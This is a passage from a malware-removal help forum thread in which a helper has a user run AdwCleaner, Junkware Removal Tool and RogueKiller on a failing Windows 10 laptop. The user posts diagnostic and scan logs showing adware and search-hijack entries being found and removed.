S3 UcmCx0101;USB Connector Manager KMDF Class Extension;C:\WINDOWS\System32\drivers\UcmCx.sys [2016-7-16 95744]
S3 UcmTcpciCx0101;UCM-TCPCI KMDF Class Extension;C:\WINDOWS\System32\drivers\UcmTcpciCx.sys [2016-7-16 108544]
S3 UcmUcsi;USB Connector Manager UCSI Client;C:\WINDOWS\System32\drivers\UcmUcsi.sys [2016-7-16 50688]
S3 UdeCx;USB Device Emulation Support Library;C:\WINDOWS\System32\drivers\Udecx.sys [2016-7-16 45568]
S3 UEFI;Microsoft UEFI Driver;C:\WINDOWS\System32\drivers\uefi.sys [2016-7-16 28512]
S3 Ufx01000;USB Function Class Extension;C:\WINDOWS\System32\drivers\ufx01000.sys [2016-7-16 263008]
S3 UfxChipidea;USB Chipidea Controller;C:\WINDOWS\System32\drivers\UfxChipidea.sys [2016-7-16 96608]
S3 ufxsynopsys;USB Synopsys Controller;C:\WINDOWS\System32\drivers\ufxsynopsys.sys [2016-7-16 137056]
S3 UrsChipidea;Chipidea USB Role-Switch Driver;C:\WINDOWS\System32\drivers\urschipidea.sys [2016-7-16 28512]
S3 UrsCx01000;USB Role-Switch Support Library;C:\WINDOWS\System32\drivers\urscx01000.sys [2016-7-16 57696]
S3 UrsSynopsys;Synopsys USB Role-Switch Driver;C:\WINDOWS\System32\drivers\urssynopsys.sys [2016-7-16 27488]
S3 USER_ESRV_SVC_WILLAMETTE;User Energy Server Service WILLAMETTE;C:\Program Files\Intel\SUR\WILLAMETTE\ESRV\esrv_svc.exe [2016-6-19 416408]
S3 UsoSvc;Update Orchestrator Service for Windows Update;C:\WINDOWS\System32\svchost.exe -k netsvcs [2016-7-16 44496]
S3 vhf;Virtual HID Framework (VHF) Driver;C:\WINDOWS\System32\drivers\vhf.sys [2016-7-16 32256]
S3 vmgid;Microsoft Hyper-V Guest Infrastructure Driver;C:\WINDOWS\System32\drivers\vmgid.sys [2016-7-16 10240]
S3 vmicguestinterface;Hyper-V Guest Service Interface;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted [2016-7-16 44496]
S3 vmicvmsession;Hyper-V PowerShell Direct Service;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted [2016-7-16 44496]
S3 WalletService;WalletService;C:\WINDOWS\System32\svchost.exe -k appmodel [2016-7-16 44496]
S3 wdiwifi;WDI Driver Framework;C:\WINDOWS\System32\drivers\WdiWiFi.sys [2017-3-15 719872]
S3 wdm_usb;wdm_usb;C:\WINDOWS\System32\drivers\usb2ser.sys [2016-8-16 159936]
S3 WdNisDrv;Windows Defender Network Inspection System Driver;C:\WINDOWS\System32\drivers\WdNisDrv.sys [2016-7-16 123232]
S3 WdNisSvc;Windows Defender Network Inspection Service;C:\Program Files\Windows Defender\NisSrv.exe [2017-4-12 347328]
S3 WEPHOSTSVC;Windows Encryption Provider Host Service;C:\WINDOWS\System32\svchost.exe -k WepHostSvcGroup [2016-7-16 44496]
S3 WinMad;WinMad Service;C:\WINDOWS\System32\drivers\winmad.sys [2016-7-16 32096]
S3 WinVerbs;WinVerbs Service;C:\WINDOWS\System32\drivers\winverbs.sys [2016-7-16 64864]
S3 wisvc;Windows Insider Service;C:\WINDOWS\System32\svchost.exe -k netsvcs [2016-7-16 44496]
S3 workfolderssvc;Work Folders;C:\WINDOWS\System32\svchost.exe -k LocalService [2016-7-16 44496]
S3 WpnUserService_20bc5;Windows Push Notifications User Service_20bc5;C:\WINDOWS\System32\svchost.exe -k UnistackSvcGroup [2016-7-16 44496]
S3 WsAudio_Device(1);WsAudio_Device(1);C:\WINDOWS\System32\drivers\VirtualAudio1.sys [2016-6-10 31080]
S3 WUDFWpdMtp;WUDFWpdMtp;C:\WINDOWS\System32\drivers\WUDFRd.sys [2016-7-16 216064]
S3 XblAuthManager;Xbox Live Auth Manager;C:\WINDOWS\System32\svchost.exe -k netsvcs [2016-7-16 44496]
S3 XblGameSave;Xbox Live Game Save;C:\WINDOWS\System32\svchost.exe -k netsvcs [2016-7-16 44496]
S3 xboxgip;Xbox Game Input Protocol Driver;C:\WINDOWS\System32\drivers\xboxgip.sys [2017-3-15 258560]
S3 XboxNetApiSvc;Xbox Live Networking Service;C:\WINDOWS\System32\svchost.exe -k netsvcs [2016-7-16 44496]
S3 xinputhid;XINPUT HID Filter Driver;C:\WINDOWS\System32\drivers\xinputhid.sys [2016-8-31 43520]
S4 shpamsvc;Shared PC Account Manager;C:\WINDOWS\System32\svchost.exe -k netsvcs [2016-7-16 44496]
S4 tzautoupdate;Auto Time Zone Updater;C:\WINDOWS\System32\svchost.exe -k LocalService [2016-7-16 44496]
.
=============== File Associations ===============
.
FileExt: .txt: txtfile=C:\WINDOWS\System32\NOTEPAD.EXE %1 [UserChoice]
ShellExec: SZBrowser.exe: open="C:\Program Files\AVAST Software\SZBrowser\Launcher.exe" "%1"
.
=============== Created Last 30 ================
.
2017-04-13 21:14:37   --------   d-----w-   C:\ProgramData\SWCUTemp
2017-04-12 23:17:39   --------   d-----w-   C:\Program Files\Reimage
2017-04-12 22:06:59   79360   ----a-w-   C:\WINDOWS\SysWow64\asycfilt.dll
2017-04-12 22:05:59   12800   ----a-w-   C:\Program Files\Windows Defender\mpuxhostproxy.dll
2017-04-12 22:04:49   411648   ----a-w-   C:\WINDOWS\System32\SensorsApi.dll
2017-04-12 22:03:59   949248   ----a-w-   C:\WINDOWS\System32\Windows.Devices.PointOfService.dll
2017-04-12 22:02:59   379904   ----a-w-   C:\WINDOWS\System32\apprepsync.dll
2017-04-12 21:19:09   --------   d-----w-   C:\ProgramData\{96FE539D-1CBC-D95B-9A7A-47190038CCD7}
2017-04-05 00:41:42   --------   d-----w-   C:\WINDOWS\Panther
2017-04-02 21:15:58   --------   d-----w-   C:\Program Files\iPod
2017-04-02 21:15:57   --------   d---a-w-   C:\Program Files\iTunes
2017-03-15 23:48:59   753152   ----a-w-   C:\WINDOWS\SysWow64\imapi2fs.dll
2017-03-15 23:47:59   57344   ----a-w-   C:\WINDOWS\SysWow64\WPDShServiceObj.dll
2017-03-15 23:46:59   2828384   ----a-w-   C:\WINDOWS\System32\d3d11.dll
2017-03-15 23:45:57   5384192   ----a-w-   C:\WINDOWS\System32\dbgeng.dll
2017-03-15 23:44:59   80224   ----a-w-   C:\WINDOWS\System32\drivers\vmbkmcl.sys
2017-03-15 23:43:03   8886976   ----a-w-   C:\WINDOWS\SysWow64\OneDriveSetup.exe
.
==================== Find3M  ====================
.
2017-04-13 21:51:01   192216   ----a-w-   C:\WINDOWS\System32\drivers\MBAMSwissArmy.sys
2017-04-05 00:27:20   75704   ----a-w-   C:\WINDOWS\System32\drivers\aswRvrt.sys
2017-04-05 00:27:20   38296   ----a-w-   C:\WINDOWS\System32\drivers\aswHwid.sys
2017-04-05 00:27:20   339696   ----a-w-   C:\WINDOWS\System32\drivers\aswVmm.sys
2017-04-05 00:27:20   127112   ----a-w-   C:\WINDOWS\System32\drivers\aswMonFlt.sys
2017-04-05 00:27:20   101152   ----a-w-   C:\WINDOWS\System32\drivers\aswRdr2.sys
2017-04-05 00:26:46   32600   ----a-w-   C:\WINDOWS\System32\drivers\aswKbd.sys
2017-04-05 00:26:46   1005048   ----a-w-   C:\WINDOWS\System32\drivers\aswSnx.sys
2017-04-05 00:26:29   48528   ----a-w-   C:\WINDOWS\System32\drivers\aswbuniva.sys
2017-04-05 00:26:29   334088   ----a-w-   C:\WINDOWS\System32\drivers\aswbloga.sys
2017-04-05 00:26:29   307736   ----a-w-   C:\WINDOWS\System32\drivers\aswbidsdrivera.sys
2017-04-05 00:26:29   189768   ----a-w-   C:\WINDOWS\System32\drivers\aswbidsha.sys
2017-04-01 18:52:38   835576   ----a-w-   C:\WINDOWS\SysWow64\FlashPlayerApp.exe
2017-04-01 18:52:38   177656   ----a-w-   C:\WINDOWS\SysWow64\FlashPlayerCPLApp.cpl
2017-03-28 07:10:34   484584   ----a-w-   C:\WINDOWS\SysWow64\AudioSes.dll
2017-03-28 07:10:28   315744   ----a-w-   C:\WINDOWS\SysWow64\atmfd.dll
2017-03-28 06:36:11   142176   ----a-w-   C:\WINDOWS\System32\acmigration.dll
2017-03-28 06:36:08   343904   ----a-w-   C:\WINDOWS\System32\invagent.dll
2017-03-28 06:36:05   565088   ----a-w-   C:\WINDOWS\System32\devinv.dll
2017-03-28 06:36:05   1617760   ----a-w-   C:\WINDOWS\System32\appraiser.dll
2017-03-28 06:36:05   1294688   ----a-w-   C:\WINDOWS\System32\aeinv.dll
2017-03-28 06:35:59   379232   ----a-w-   C:\WINDOWS\System32\atmfd.dll
2017-03-28 06:32:26   198856   ----a-w-   C:\WINDOWS\System32\wscapi.dll
2017-03-28 06:29:11   2213248   ----a-w-   C:\WINDOWS\System32\KernelBase.dll
2017-03-28 06:28:05   7786336   ----a-w-   C:\WINDOWS\System32\ntoskrnl.exe
2017-03-28 06:28:03   773720   ----a-w-   C:\WINDOWS\System32\oleaut32.dll
2017-03-28 06:26:21   603488   ----a-w-   C:\WINDOWS\System32\ContentDeliveryManager.Utilities.dll
2017-03-28 06:26:11   218520   ----a-w-   C:\WINDOWS\System32\LsaIso.exe
2017-03-28 06:22:07   2681200   ----a-w-   C:\WINDOWS\System32\CoreUIComponents.dll
2017-03-28 06:21:27   167848   ----a-w-   C:\WINDOWS\SysWow64\wscapi.dll
2017-03-28 06:20:43   2717184   ----a-w-   C:\WINDOWS\SysWow64\PrintConfig.dll
2017-03-28 06:20:11   764392   ----a-w-   C:\WINDOWS\System32\CoreMessaging.dll
2017-03-28 06:20:04   1181024   ----a-w-   C:\WINDOWS\System32\drivers\ndis.sys
2017-03-28 06:19:26   601712   ----a-w-   C:\WINDOWS\SysWow64\oleaut32.dll
2017-03-28 06:18:07   1705976   ----a-w-   C:\WINDOWS\SysWow64\KernelBase.dll
2017-03-28 06:15:53   2048496   ----a-w-   C:\WINDOWS\SysWow64\CoreUIComponents.dll
2017-03-28 06:12:54   328008   ----a-w-   C:\WINDOWS\System32\Windows.Storage.ApplicationData.dll
2017-03-28 06:11:30   360040   ----a-w-   C:\WINDOWS\System32\SystemSettingsAdminFlows.exe
2017-03-28 06:11:30   2187616   ----a-w-   C:\WINDOWS\System32\drivers\dxgkrnl.sys
2017-03-28 06:11:14   1860288   ----a-w-   C:\WINDOWS\System32\Windows.ApplicationModel.Store.dll
2017-03-28 06:11:11   1738560   ----a-w-   C:\WINDOWS\System32\WindowsCodecs.dll
2017-03-28 06:11:09   402784   ----a-w-   C:\WINDOWS\System32\drivers\dxgmms1.sys
2017-03-28 06:10:53   178528   ----a-w-   C:\WINDOWS\System32\CloudExperienceHostUser.dll
2017-03-28 06:10:44   1157008   ----a-w-   C:\WINDOWS\System32\twinapi.appcore.dll
2017-03-28 06:10:42   146776   ----a-w-   C:\WINDOWS\System32\CloudExperienceHostCommon.dll
2017-03-28 06:10:41   7220184   ----a-w-   C:\WINDOWS\System32\windows.storage.dll
2017-03-28 06:10:29   1293152   ----a-w-   C:\WINDOWS\System32\LicenseManager.dll
2017-03-28 06:09:48   97128   ----a-w-   C:\WINDOWS\System32\Windows.Security.Credentials.UI.CredentialPicker.dll
2017-03-28 06:09:40   624048   ----a-w-   C:\WINDOWS\System32\drivers\cng.sys
2017-03-28 06:09:22   2446704   ----a-w-   C:\WINDOWS\System32\msxml6.dll
2017-03-28 06:09:18   682816   ----a-w-   C:\WINDOWS\System32\wer.dll
2017-03-28 06:08:48   1100128   ----a-w-   C:\WINDOWS\System32\hvix64.exe
2017-03-28 06:08:43   1267504   ----a-w-   C:\WINDOWS\System32\WinTypes.dll
2017-03-28 06:08:39   989024   ----a-w-   C:\WINDOWS\System32\hvax64.exe
2017-03-28 06:07:35   263472   ----a-w-   C:\WINDOWS\SysWow64\Windows.Storage.ApplicationData.dll
2017-03-28 06:06:47   92512   ----a-w-   C:\WINDOWS\System32\rdpudd.dll
2017-03-28 06:05:31   4260576   ----a-w-   C:\WINDOWS\System32\mfcore.dll
2017-03-28 06:05:29   8168512   ----a-w-   C:\WINDOWS\System32\Windows.Media.Protection.PlayReady.dll
2017-03-28 06:05:17   1702392   ----a-w-   C:\WINDOWS\System32\mfasfsrcsnk.dll
2017-03-28 06:05:15   1848584   ----a-w-   C:\WINDOWS\System32\mfsrcsnk.dll
2017-03-28 06:05:14   1988048   ----a-w-   C:\WINDOWS\System32\mfmp4srcsnk.dll
2017-03-28 06:05:14   1072248   ----a-w-   C:\WINDOWS\System32\mfnetcore.dll
2017-03-28 06:05:11   1302136   ----a-w-   C:\WINDOWS\System32\mfmpeg2srcsnk.dll
2017-03-28 06:05:07   1504056   ----a-w-   C:\WINDOWS\SysWow64\WindowsCodecs.dll
2017-03-28 06:04:59   277344   ----a-w-   C:\WINDOWS\System32\drivers\msiscsi.sys
2017-03-28 06:04:58   1431232   ----a-w-   C:\WINDOWS\SysWow64\Windows.ApplicationModel.Store.dll
2017-03-28 06:04:54   1276760   ----a-w-   C:\WINDOWS\System32\ole32.dll
2017-03-28 06:04:53   136032   ----a-w-   C:\WINDOWS\SysWow64\CloudExperienceHostUser.dll
2017-03-28 06:04:39   116568   ----a-w-   C:\WINDOWS\SysWow64\CloudExperienceHostCommon.dll
2017-03-28 06:04:38   5721808   ----a-w-   C:\WINDOWS\SysWow64\windows.storage.dll
2017-03-28 06:04:32   975744   ----a-w-   C:\WINDOWS\SysWow64\twinapi.appcore.dll
2017-03-28 06:04:31   861024   ----a-w-   C:\WINDOWS\SysWow64\LicenseManager.dll
2017-03-28 06:04:31   241504   ----a-w-   C:\WINDOWS\System32\CloudExperienceHost.dll
2017-03-28 06:04:30   160088   ----a-w-   C:\WINDOWS\System32\CloudExperienceHostBroker.dll
2017-03-28 06:04:17   1600632   ----a-w-   C:\WINDOWS\System32\sppobjs.dll
2017-03-28 06:02:55   576408   ----a-w-   C:\WINDOWS\SysWow64\wer.dll
2017-03-28 06:02:48   1980768   ----a-w-   C:\WINDOWS\SysWow64\msxml6.dll
2017-03-28 06:02:01   846560   ----a-w-   C:\WINDOWS\SysWow64\WinTypes.dll
2017-03-28 06:00:09   1569184   ----a-w-   C:\WINDOWS\System32\gdi32full.dll
2017-03-28 06:00:05   628552   ----a-w-   C:\WINDOWS\System32\fontdrvhost.exe
2017-03-28 05:59:11   6667520   ----a-w-   C:\WINDOWS\SysWow64\Windows.Media.Protection.PlayReady.dll
2017-03-28 05:59:05   2533728   ----a-w-   C:\WINDOWS\System32\drivers\tcpip.sys
2017-03-28 05:59:01   4023008   ----a-w-   C:\WINDOWS\SysWow64\mfcore.dll
2017-03-28 05:58:59   1851688   ----a-w-   C:\WINDOWS\SysWow64\mfmp4srcsnk.dll
2017-03-28 05:58:53   981888   ----a-w-   C:\WINDOWS\SysWow64\mfnetcore.dll
2017-03-28 05:58:53   1360464   ----a-w-   C:\WINDOWS\SysWow64\mfnetsrc.dll
2017-03-28 05:58:53   1344448   ----a-w-   C:\WINDOWS\SysWow64\mfsrcsnk.dll
2017-03-28 05:58:52   1277856   ----a-w-   C:\WINDOWS\SysWow64\mfasfsrcsnk.dll
2017-03-28 05:58:50   1202936   ----a-w-   C:\WINDOWS\SysWow64\mfmpeg2srcsnk.dll
2017-03-28 05:58:45   387872   ----a-w-   C:\WINDOWS\System32\wmpps.dll
2017-03-28 05:58:44   372440   ----a-w-   C:\WINDOWS\System32\Windows.Media.MediaControl.dll
2017-03-28 05:58:27   961192   ----a-w-   C:\WINDOWS\SysWow64\ole32.dll
2017-03-28 05:53:54   545944   ----a-w-   C:\WINDOWS\SysWow64\fontdrvhost.exe
2017-03-28 05:53:54   1414728   ----a-w-   C:\WINDOWS\SysWow64\gdi32full.dll
2017-03-28 05:52:00   306800   ----a-w-   C:\WINDOWS\SysWow64\Windows.Media.MediaControl.dll
2017-03-28 05:48:07   5685760   ----a-w-   C:\WINDOWS\SysWow64\Windows.Data.Pdf.dll
2017-03-28 05:44:50   7216640   ----a-w-   C:\WINDOWS\System32\Windows.Data.Pdf.dll
2017-03-28 05:42:28   95232   ----a-w-   C:\WINDOWS\SysWow64\UserDataTimeUtil.dll
2017-03-28 05:42:06   51712   ----a-w-   C:\WINDOWS\SysWow64\usoapi.dll
2017-03-28 05:41:51   372736   ----a-w-   C:\WINDOWS\System32\RDXTaskFactory.dll
.
============= FINISH: 17:52:37.31 ===============

.
UNLESS SPECIFICALLY INSTRUCTED, DO NOT POST THIS LOG.
IF REQUESTED, ZIP IT UP & ATTACH IT
.
DDS (Ver_2012-11-20.01)
.
Microsoft Windows 10 Home
Boot Device: \Device\HarddiskVolume2
Install Date: 8/7/2016 2:17:33 PM
System Uptime: 4/13/2017 5:12:19 PM (0 hours ago)
.
Motherboard: Gateway |  | EG50_HC_CR
Processor: Intel(R) Celeron(R) CPU 1000M @ 1.80GHz | U3E1 | 1800/100mhz
.
==== Disk Partitions =========================
.
C: is FIXED (NTFS) - 281 GiB total, 156.068 GiB free.
D: is CDROM ()
.
==== Disabled Device Manager Items =============
.
==== System Restore Points ===================
.
RP44: 4/12/2017 6:31:40 PM - Windows Update
.
==== Installed Programs ======================
.
Apple Application Support (32-bit)
Apple Application Support (64-bit)
Apple Mobile Device Support
Apple Software Update
Avast Free Antivirus
Bonjour
Broadcom Card Reader Driver Installer
CCleaner
Defraggler
ELAN Touchpad 11.15.0.18_X64
ESET Online Scanner v3
Google Chrome
Google Update Helper
ImgBurn
Intel(R) Driver Update Utility 2.5
Intel(R) Management Engine Components
Intel(R) ME UninstallLegacy
Intel(R) Processor Graphics
Intel(R) Product Improvement Program
Intel® Driver Update Utility
Intel® Security Assist
Intel® Trusted Connect Service Client
iTunes
LibreOffice 5.2.6.2
Malwarebytes Anti-Malware version 2.2.1.1043
Microsoft OneDrive
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501
Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005
Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.23026
Microsoft Visual C++ 2015 x86 Additional Runtime - 14.0.23026
Microsoft Visual C++ 2015 x86 Minimum Runtime - 14.0.23026
Mp3tag v2.81
MusicBee 3.0
Qualcomm Atheros Bluetooth Suite (64)
Qualcomm Atheros WiFi Driver Installation
SafeZone Stable 3.55.2393.596
Samsung USB Driver for Mobile Phones
Smart Switch
Speccy
SpywareBlaster 5.5
SumatraPDF
SUPERAntiSpyware
Windows 10 Upgrade Assistant
.
==== Event Viewer Messages From Past Week ========
.
4/13/2017 5:13:31 PM, Error: Microsoft-Windows-DistributedCOM [10016]  - The application-specific permission settings do not grant Local Activation permission for the COM Server application with CLSID  {8D8F4F83-3594-4F07-8369-FC3C3CAE4919}  and APPID  {F72671A9-012C-4725-9D2F-2A4D32D65169}  to the user NT AUTHORITY\SYSTEM SID (S-1-5-18) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.
4/13/2017 5:12:48 PM, Error: Service Control Manager [7000]  - The Update service service failed to start due to the following error:  Access is denied.
4/13/2017 5:11:32 PM, Error: Microsoft-Windows-DistributedCOM [10016]  - The application-specific permission settings do not grant Local Activation permission for the COM Server application with CLSID  {D63B10C5-BB46-4990-A94F-E40B9D520160}  and APPID  {9CA88EE3-ACB7-47C8-AFC4-AB702511C276}  to the user NT AUTHORITY\SYSTEM SID (S-1-5-18) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.
4/12/2017 5:18:50 PM, Error: Service Control Manager [7034]  - The Update service service terminated unexpectedly.  It has done this 1 time(s).
4/12/2017 4:06:21 PM, Error: Microsoft-Windows-WLAN-AutoConfig [4003]  - WLAN AutoConfig detected limit connectivity, performing Reset/Recover.adapter.  Code: 8 0x0 0x0
4/12/2017 4:05:59 PM, Error: Microsoft-Windows-WLAN-AutoConfig [4003]  - WLAN AutoConfig detected limit connectivity, performing Reset/Recover.adapter.  Code: 2 0xDEADDEED 0xEEEC
4/12/2017 4:05:59 PM, Error: Microsoft-Windows-WLAN-AutoConfig [4003]  - WLAN AutoConfig detected limit connectivity, performing Reset/Recover.adapter.  Code: 1 0xC 0x4
.
==== End Of File ===========================
« Last Edit: April 13, 2017, 05:30:40 PM by Hoov »

Offline Hoov

  • Malware Removal Mentors
  • Administrator
  • Diamond Member
  • Posts: 27138
  • Unwilling part owner of Gov't. Motors and Chrysler
    • Hoov's Personal Site
Re: [In Progress] Problems with computer
« Reply #1 on: April 13, 2017, 05:32:14 PM »
Can you tell me what your computer is doing?

1.- Download AdwCleaner by Xplode onto your Desktop.
  •   Please close all open programs and internet browsers.
  •   Double click on Adwcleaner.exe to run the tool.
  •   Click on the Scan button.
  •   Please be patient as this can take a while to complete.
  •   You will get a prompt asking to close all programs. Click OK.
  •   Click OK again to reboot your computer. A text file will open after the restart.
  •   Please post the content of that logfile in your reply.
  •   You can find the logfile at C:\AdwCleaner[Sn].txt.
2.- Download Junkware Removal Tool to your desktop.
  • Shut down your antivirus to avoid any conflicts.
  • Run the tool by double-clicking it.
  • The tool will open and start scanning your system.
  • Please be patient as this can take a while to complete.
  • On completion, a log (JRT.txt) is saved to your desktop and will automatically open.
  • Post the contents of JRT.txt in your next message.
3.- Please download RogueKiller and save it to the desktop.
  • Close all windows and browsers
  • Double click on RogueKiller.exe to run the tool.
  • Press the scan button.
  • A report opens on the desktop named - RKreport.txt
  • Please post it in your next reply.

Former Consumer Security MVP
2011-2014

If I am helping you and you don't hear from me for 24Hrs, send me a PM Please!

Offline mommyto3furballs

Re: [In Progress] Problems with computer
« Reply #2 on: April 13, 2017, 07:18:57 PM »
trying to get all my files off this computer before it gets scrapped. unfortunately stuff started not working anymore. my usb port quit working so i can't use my external hd, my dvd burner/player disappears every so often, and i can't back up the files for my new computer. this hd is still good yet, and would like to keep it but also need my files on here. beyond frustrated at the moment.

while doing the scan some issues did come to light so hoping that is part of the issue. i don't have backups on some of the files on this computer. i know better :(

# AdwCleaner v6.045 - Logfile created 13/04/2017 at 19:57:42
# Updated on 28/03/2017 by Malwarebytes
# Database : 2017-04-13.1 [Server]
# Operating System : Windows 10 Home  (X64)
# Username : ghy - DESKTOP-4GKB2LG
# Running from : C:\Users\ghy\Downloads\AdwCleaner.exe
# Mode: Scan
# Support : https://www.malwarebytes.com/support



***** [ Services ] *****

Service Found:  Update service


***** [ Folders ] *****

Folder Found:  C:\Program Files\Reimage
Folder Found:  C:\Program Files\reimage


***** [ Files ] *****

File Found:  C:\WINDOWS\Reimage.ini


***** [ DLL ] *****

No malicious DLLs found.


***** [ WMI ] *****

No malicious keys found.


***** [ Shortcuts ] *****

No infected shortcut found.


***** [ Scheduled Tasks ] *****

Task Found:  Yahoo! Powered tadid


***** [ Registry ] *****

Key Found:  HKLM\SOFTWARE\Classes\REI_AxControl.ReiEngine
Key Found:  HKLM\SOFTWARE\Classes\REI_AxControl.ReiEngine.1
Key Found:  [x64] HKLM\SOFTWARE\Classes\REI_AxControl.ReiEngine
Key Found:  [x64] HKLM\SOFTWARE\Classes\REI_AxControl.ReiEngine.1
Key Found:  HKLM\SOFTWARE\Classes\AppID\{28FF42B8-A0DA-4BE5-9B81-E26DD59B350A}
Key Found:  HKLM\SOFTWARE\Classes\Interface\{9BB31AD8-5DB2-459E-A901-DEA536F23BA4}
Key Found:  HKLM\SOFTWARE\Classes\Interface\{BD51A48E-EB5F-4454-8774-EF962DF64546}
Key Found:  HKLM\SOFTWARE\Classes\TypeLib\{FA6468D2-FAA4-4951-A53B-2A5CF9CC0A36}
Key Found:  HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{10ECCE17-29B5-4880-A8F5-EAD298611484}
Key Found:  HKU\S-1-5-21-2176856750-3379297402-3027562793-1001\Software\PRODUCTSETUP
Key Found:  HKU\S-1-5-21-2176856750-3379297402-3027562793-1001\Software\Reimage
Key Found:  HKU\S-1-5-21-2176856750-3379297402-3027562793-1001\Software\Local AppWizard-Generated Applications\Reimage - Windows Problem Relief.
Key Found:  HKU\S-1-5-21-2176856750-3379297402-3027562793-1001\Software\csastats
Key Found:  HKCU\Software\PRODUCTSETUP
Key Found:  HKCU\Software\Reimage
Key Found:  HKCU\Software\Local AppWizard-Generated Applications\Reimage - Windows Problem Relief.
Key Found:  HKCU\Software\csastats
Key Found:  [x64] HKCU\Software\PRODUCTSETUP
Key Found:  [x64] HKCU\Software\Reimage
Key Found:  [x64] HKCU\Software\Local AppWizard-Generated Applications\Reimage - Windows Problem Relief.
Key Found:  [x64] HKCU\Software\csastats
Key Found:  [x64] HKLM\SOFTWARE\Reimage
Data Found:  HKU\S-1-5-21-2176856750-3379297402-3027562793-1001\Software\Microsoft\Internet Explorer\Main [Start Page] - hxxps://ca.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_fs_17_15&p
Data Found:  HKCU\Software\Microsoft\Internet Explorer\Main [Start Page] - hxxps://ca.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_fs_17_15&param1=1&param2=f%3D1%26b%3DIE%26cc%3Dca%26pa%3
Data Found:  HKLM\SOFTWARE\Microsoft\Internet Explorer\Main [Start Page] - hxxps://ca.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_fs_17_15&param1=1&param2=f%3D1%26b%3DIE%26cc%3Dca%26pa%3
Data Found:  [x64] HKCU\Software\Microsoft\Internet Explorer\Main [Start Page] - hxxps://ca.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_fs_17_15&param1=1&param2=f%3D1%26b%3DIE%26cc%3Dca%26pa
Data Found:  [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\Main [Start Page] - hxxps://ca.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_fs_17_15&param1=1&param2=f%3D1%26b%3DIE%26cc%3Dca%26pa
Key Found:  HKU\S-1-5-21-2176856750-3379297402-3027562793-1001\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}
Data Found:  HKU\S-1-5-21-2176856750-3379297402-3027562793-1001\Software\Microsoft\Internet Explorer\SearchScopes [DefaultScope] -
Key Found:  HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}
Data Found:  HKCU\Software\Microsoft\Internet Explorer\SearchScopes [DefaultScope] -
Key Found:  HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}
Data Found:  HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes [DefaultScope] -
Key Found:  [x64] HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}
Data Found:  [x64] HKCU\Software\Microsoft\Internet Explorer\SearchScopes [DefaultScope] -
Key Found:  [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}
Data Found:  [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes [DefaultScope] -
Key Found:  HKLM\SOFTWARE\Classes\AppID\REI_AxControl.DLL


***** [ Web browsers ] *****

No malicious Firefox based browser items found.
No malicious Chromium based browser items found.

*************************

C:\AdwCleaner\AdwCleaner[C1].txt - [1307 Bytes] - [14/06/2016 11:32:50]
C:\AdwCleaner\AdwCleaner[C2].txt - [1539 Bytes] - [17/11/2016 20:47:04]
C:\AdwCleaner\AdwCleaner[S1].txt - [1114 Bytes] - [14/06/2016 11:29:35]
C:\AdwCleaner\AdwCleaner[S2].txt - [1093 Bytes] - [03/08/2016 19:32:09]
C:\AdwCleaner\AdwCleaner[S3].txt - [1655 Bytes] - [17/11/2016 20:46:43]
C:\AdwCleaner\AdwCleaner[S4].txt - [5142 Bytes] - [13/04/2017 19:57:42]

########## EOF - C:\AdwCleaner\AdwCleaner[S4].txt - [5215 Bytes] ##########

Offline mommyto3furballs

Re: [In Progress] Problems with computer
« Reply #3 on: April 13, 2017, 07:20:55 PM »
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Junkware Removal Tool (JRT) by Malwarebytes
Version: 8.1.3 (04.10.2017)
Operating System: Windows 10 Home x64
Ran by ghy (Administrator) on Thu 04/13/2017 at 20:07:24.77
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




File System: 2

Successfully deleted: C:\WINDOWS\reimage.ini (File)
Successfully deleted: C:\Program Files\reimage (Folder)



Registry: 0





~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on Thu 04/13/2017 at 20:12:50.72
End of JRT log
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Offline mommyto3furballs

Re: [In Progress] Problems with computer
« Reply #4 on: April 13, 2017, 07:22:02 PM »
RogueKiller V12.10.4.0 (x64) [Apr 10 2017] (Free) by Adlice Software
mail : http://www.adlice.com/contact/
Feedback : https://forum.adlice.com
Website : http://www.adlice.com/download/roguekiller/
